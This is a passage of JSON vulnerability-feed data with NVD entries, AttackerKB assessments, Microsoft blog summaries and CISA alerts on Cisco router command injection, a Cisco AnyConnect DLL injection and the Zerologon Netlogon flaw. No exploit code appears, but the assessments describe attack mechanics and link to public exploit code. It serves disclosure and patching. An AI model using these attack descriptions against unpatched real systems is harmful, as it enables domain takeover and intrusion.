5.9}, "published": "2021-01-13T22:15:00", "title": "CVE-2021-1146", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1146"], "modified": "2021-01-19T23:12:00", "cpe": ["cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/a:cisco:application_extension_platform:1.0.3.55", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8"], "id": "CVE-2021-1146", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1146", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "A vulnerability in the Network Access Manager and Web Security Agent components of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "title": "CVE-2021-1237", "type": "cve", "cwe": ["CWE-427"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1237"], "modified": "2021-01-19T18:39:00", "cpe": [], "id": "CVE-2021-1237", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1237", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2021-02-02T07:55:04", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities.", "edition": 4, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "title": "CVE-2021-1148", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1148"], "modified": "2021-01-15T15:53:00", "cpe": ["cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/a:cisco:application_extension_platform:1.0.3.55", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8"], "id": "CVE-2021-1148", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1148", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:36:59", "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.", "edition": 19, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-08-17T19:15:00", "title": "CVE-2020-1472", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-24T16:15:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:opensuse:leap:15.1", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:opensuse:leap:15.2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2020-1472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*"]}], "attackerkb": [{"lastseen": "2021-02-22T12:14:57", "bulletinFamily": "info", "cvelist": ["CVE-2021-1237"], "description": "A vulnerability in the Network Access Manager and Web Security Agent components of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 29, 2021 10:43pm UTC reported:\n\nInteresting vulnerability :) On Windows systems running Cisco AnyConnect Secure Mobility Client for Windows releases earlier than Release 4.9.04043, authenticated attackers could modify a configuration file that was loaded and used when Cisco AnyConnect starts up to load an arbitrary DLL and have it be run as the SYSTEM user. The advisory at <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-injec-pQnryXLf> does not specify which file this is, however I imagine it would be possible to find it by using ProcMon, applying the appropriate filters, and then restarting the Cisco AnyConnect process and looking for any attempts to load a configuration file. From there it would then just be a case of figuring out the configuration file format.\n\nUnfortunately without knowing the configuration file format, its a little hard to say how tough this vulnerability is to exploit. Given that you can load an arbitrary DLL file though I imagine the file format must not be too stringent, as otherwise such behavior would be blocked, but this says nothing as to whether the file is a binary format, a text format, or something else or if there are many fields that need to be filled in for the exploit to succeed or just a few.\n\nGiven this I\u2019m giving this exploitability rating a 3/5 to play on the safe side of things. Its probably possible but without further info its possible it may take some effort to form a valid configuration file which could make exploitation of this vulnerability considerably more difficult.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3\n", "modified": "2021-01-20T00:00:00", "published": "2021-01-13T00:00:00", "id": "AKB:024E1B87-5E35-4D1D-BE39-A370F2954FC1", "href": "https://attackerkb.com/topics/sameb970DM/cve-2021-1237", "type": "attackerkb", "title": "CVE-2021-1237", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T21:14:10", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472", "CVE-2020-2021"], "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka \u2018Netlogon Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**VoidSec** at September 15, 2020 8:31am UTC reported:\n\nUnauthenticated attacker, able to directly connect to a Domain Controller over [NRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>) will be able to reset the Domain Controller\u2019s account password to an empty string, thus enabling the attackers to further escalate their privileges to Domain Admin.\n\nThe exploit will be successful only if the Domain Controller uses the password stored in Active Directory to validate the login attempt, rather than the one stored locally as, when changing a password in this way, it is only changed in the AD. The targeted system itself will still locally store its original password. \nTarget computer will then not be able to authenticate to the domain anymore, and it can only be re-synchronized through manual action. \nIn test lab a successful attack broke the following functionalities when targeting a Domain Controller: DNS functionality and/or communication with replication Domain Controllers.\n\n[Checker and Exploit code](<https://github.com/VoidSec/CVE-2020-1472>) \nOriginal research and white-paper: [Secura \u2013 Tom Tervoort](<https://www.secura.com/blog/zero-logon\\]\\(https://www.secura.com/blog/zero-logon>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**jpcastr0** at September 16, 2020 3:29pm UTC reported:\n\nUnauthenticated attacker, able to directly connect to a Domain Controller over [NRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>) will be able to reset the Domain Controller\u2019s account password to an empty string, thus enabling the attackers to further escalate their privileges to Domain Admin.\n\nThe exploit will be successful only if the Domain Controller uses the password stored in Active Directory to validate the login attempt, rather than the one stored locally as, when changing a password in this way, it is only changed in the AD. The targeted system itself will still locally store its original password. \nTarget computer will then not be able to authenticate to the domain anymore, and it can only be re-synchronized through manual action. \nIn test lab a successful attack broke the following functionalities when targeting a Domain Controller: DNS functionality and/or communication with replication Domain Controllers.\n\n[Checker and Exploit code](<https://github.com/VoidSec/CVE-2020-1472>) \nOriginal research and white-paper: [Secura \u2013 Tom Tervoort](<https://www.secura.com/blog/zero-logon\\]\\(https://www.secura.com/blog/zero-logon>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**wvu-r7** at August 11, 2020 10:15pm UTC reported:\n\nUnauthenticated attacker, able to directly connect to a Domain Controller over [NRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>) will be able to reset the Domain Controller\u2019s account password to an empty string, thus enabling the attackers to further escalate their privileges to Domain Admin.\n\nThe exploit will be successful only if the Domain Controller uses the password stored in Active Directory to validate the login attempt, rather than the one stored locally as, when changing a password in this way, it is only changed in the AD. The targeted system itself will still locally store its original password. \nTarget computer will then not be able to authenticate to the domain anymore, and it can only be re-synchronized through manual action. \nIn test lab a successful attack broke the following functionalities when targeting a Domain Controller: DNS functionality and/or communication with replication Domain Controllers.\n\n[Checker and Exploit code](<https://github.com/VoidSec/CVE-2020-1472>) \nOriginal research and white-paper: [Secura \u2013 Tom Tervoort](<https://www.secura.com/blog/zero-logon\\]\\(https://www.secura.com/blog/zero-logon>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**zeroSteiner** at October 09, 2020 5:00pm UTC reported:\n\nUnauthenticated attacker, able to directly connect to a Domain Controller over [NRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>) will be able to reset the Domain Controller\u2019s account password to an empty string, thus enabling the attackers to further escalate their privileges to Domain Admin.\n\nThe exploit will be successful only if the Domain Controller uses the password stored in Active Directory to validate the login attempt, rather than the one stored locally as, when changing a password in this way, it is only changed in the AD. The targeted system itself will still locally store its original password. \nTarget computer will then not be able to authenticate to the domain anymore, and it can only be re-synchronized through manual action. \nIn test lab a successful attack broke the following functionalities when targeting a Domain Controller: DNS functionality and/or communication with replication Domain Controllers.\n\n[Checker and Exploit code](<https://github.com/VoidSec/CVE-2020-1472>) \nOriginal research and white-paper: [Secura \u2013 Tom Tervoort](<https://www.secura.com/blog/zero-logon\\]\\(https://www.secura.com/blog/zero-logon>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**gwillcox-r7** at October 20, 2020 6:00pm UTC reported:\n\nUnauthenticated attacker, able to directly connect to a Domain Controller over [NRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>) will be able to reset the Domain Controller\u2019s account password to an empty string, thus enabling the attackers to further escalate their privileges to Domain Admin.\n\nThe exploit will be successful only if the Domain Controller uses the password stored in Active Directory to validate the login attempt, rather than the one stored locally as, when changing a password in this way, it is only changed in the AD. The targeted system itself will still locally store its original password. \nTarget computer will then not be able to authenticate to the domain anymore, and it can only be re-synchronized through manual action. \nIn test lab a successful attack broke the following functionalities when targeting a Domain Controller: DNS functionality and/or communication with replication Domain Controllers.\n\n[Checker and Exploit code](<https://github.com/VoidSec/CVE-2020-1472>) \nOriginal research and white-paper: [Secura \u2013 Tom Tervoort](<https://www.secura.com/blog/zero-logon\\]\\(https://www.secura.com/blog/zero-logon>)\n", "modified": "2020-11-18T00:00:00", "published": "2020-08-17T00:00:00", "id": "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "href": "https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon", "type": "attackerkb", "title": "CVE-2020-1472 aka Zerologon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2020-10-29T21:40:29", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020. If the original guidance is not applied, the vulnerability could allow an attacker to spoof a domain controller account that could be \u2026\n\n[ Attacks exploiting Netlogon vulnerability (CVE-2020-1472) Read More \u00bb](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>)", "modified": "2020-10-29T20:02:19", "published": "2020-10-29T20:02:19", "id": "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "href": "https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/", "type": "msrc", "title": "Attacks exploiting Netlogon vulnerability (CVE-2020-1472)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T02:37:55", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "Microsoft addressed a Critical RCE vulnerability affecting the Netlogon protocol (CVE-2020-1472) on August 11, 2020. We are reminding our customers that beginning with the February 9, 2021 Security Update release we will be enabling Domain Controller enforcement mode by default. This will block vulnerable connections from non-compliant devices. DC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the \u2026\n\n[ Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472 Read More \u00bb](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>)", "modified": "2021-01-15T02:31:56", "published": "2021-01-15T02:31:56", "id": "MSRC:5B84BD451283462DC81D4090EFE66280", "href": "https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/", "type": "msrc", "title": "Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:41", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "The Samba Team has released a security update to address a critical vulnerability\u2014CVE-2020-1472\u2014in multiple versions of Samba. This vulnerability could allow a remote attacker to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Samba Security Announcement for [CVE-2020-1472](<https://www.samba.org/samba/security/CVE-2020-1472.html>) and apply the necessary updates or workaround.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/21/samba-releases-security-update-cve-2020-1472>); we'd welcome your feedback.\n", "modified": "2020-09-21T00:00:00", "published": "2020-09-21T00:00:00", "id": "CISA:7FB0A467C0EB89B6198A58418B43D50C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/21/samba-releases-security-update-cve-2020-1472", "type": "cisa", "title": "Samba Releases Security Update for CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:34", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "Microsoft has released a [blog post](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) on cyber threat actors exploiting CVE-2020-1472, an elevation of privilege vulnerability in Microsoft\u2019s Netlogon. A remote attacker can exploit this vulnerability to breach unpatched Active Directory domain controllers and obtain domain administrator access. The Cybersecurity and Infrastructure Security Agency (CISA) has observed nation state activity exploiting this vulnerability. This malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks.\n\nCISA urges administrators to patch all domain controllers immediately\u2014until every domain controller is updated, the entire infrastructure remains vulnerable, as threat actors can identify and exploit a vulnerable system in minutes. If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed that malicious cyber actors have compromised all identity services.\n\nIn the coming weeks and months, administrators should take follow-on actions that are described in [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) released by Microsoft to prepare for the second half of Microsoft\u2019s Netlogon migration process, which is scheduled to conclude in February 2021.\n\nCISA encourages users and administrators to review the following resources and apply the necessary updates and mitigations.\n\n * Microsoft blog post: [Attacks exploiting Netlogon vulnerability (CVE-2020-1472)](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>)\n * Microsoft: August Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n * Microsoft: [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)\n * CISA Joint Cybersecurity Advisory: [AA20-283A APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>); we'd welcome your feedback.\n", "modified": "2020-12-10T00:00:00", "published": "2020-10-29T00:00:00", "id": "CISA:61F2653EF56231DB3AEC3A9E938133FE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472", "type": "cisa", "title": "Microsoft Warns of Continued Exploitation of CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:40", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "The Cybersecurity and Infrastructure Security Agency (CISA) is aware of publicly available exploit code for CVE-2020-1472, an elevation of privilege vulnerability in Microsoft\u2019s Netlogon. Although Microsoft provided patches for CVE-2020-1472 in August 2020, unpatched systems will be an attractive target for malicious actors. Attackers could exploit this vulnerability to obtain domain administrator access.\n\nCISA encourages users and administrators to review Microsoft\u2019s August Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 >) and [Article](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) for more information and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>); we'd welcome your feedback.\n", "modified": "2020-09-14T00:00:00", "published": "2020-09-14T00:00:00", "id": "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472", "type": "cisa", "title": "Exploit for Netlogon Remote Protocol Vulnerability, CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:39", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "The Cybersecurity and Infrastructure Security Agency (CISA) is aware of active exploitation of CVE-2020-1472, an [elevation of privilege vulnerability in Microsoft\u2019s Netlogon](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472 >). A remote attacker can exploit this vulnerability to breach unpatched Active Directory domain controllers and obtain domain administrator access. Applying patches from Microsoft\u2019s August 2020 Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 >) can prevent exploitation of this vulnerability.\n\nCISA has released a [patch validation script](<https://github.com/cisagov/cyber.dhs.gov/tree/master/assets/report/ed-20-04_script >) to detect unpatched Microsoft domain controllers. CISA urges administrators to patch all domain controllers immediately\u2014until every domain controller is updated, the entire infrastructure remains vulnerable. Review the following resources for more information:\n\n * [CISA Patch Validation Script](<https://github.com/cisagov/cyber.dhs.gov/tree/master/assets/report/ed-20-04_script>)\n * [CISA Emergency Directive 20-04: Mitigate Netlogon Elevation of Privilege Vulnerability from August 2020 Patch Tuesday](<https://cyber.dhs.gov/ed/20-04/>)\n * CERT/CC Vulnerability Note [VU#490028](<https://www.kb.cert.org/vuls/id/490028>)\n * Microsoft Security Vulnerability Information for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 >)\n * Microsoft\u2019s guidance on [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc >)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/24/unpatched-domain-controllers-remain-vulnerable-netlogon>); we'd welcome your feedback.\n", "modified": "2020-09-24T00:00:00", "published": "2020-09-24T00:00:00", "id": "CISA:2B970469D89016F563E142BE209443D8", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/24/unpatched-domain-controllers-remain-vulnerable-netlogon", "type": "cisa", "title": "Unpatched Domain Controllers Remain Vulnerable to Netlogon Vulnerability, CVE-2020-1472", "cvss": {"score": 9.3, "vector": 